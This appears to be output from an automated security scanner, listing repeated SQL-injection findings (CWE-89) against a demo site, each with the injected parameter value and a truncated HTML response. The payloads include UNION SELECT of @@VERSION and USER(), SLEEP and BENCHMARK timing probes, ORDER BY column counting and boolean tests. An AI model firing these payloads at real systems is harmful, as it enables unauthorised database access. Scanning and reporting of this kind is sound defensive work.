href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #678\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Valuedemouser@deepfence.io UNION SELECT @@VERSION,SLEEP(5),USER(),\nBENCHMARK(1000000,MD5('A')),5,6,7,8,9,10#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #679\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 5\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #680\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 13\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #681\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io\" \"\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #682\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioUNION ALL SELECT 'INJ'||'ECT'||'XXX',\n2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28\n--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #683Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io %' AND 8310=8310 AND '%'='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #684\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioSLEEP(5)--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"ze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #685\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #686\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #687\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io AS INJECTX WHERE 1=1 AND 1=0\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/z8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #688\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #689\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified Name ValueParameters demouser@\ndeepfence.ioAND 1\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #690\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]Action Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #691\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT @@VERSION,USER(),SLEEP(5),\nBENCHMARK(1000000,MD5('A')),NULL--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" 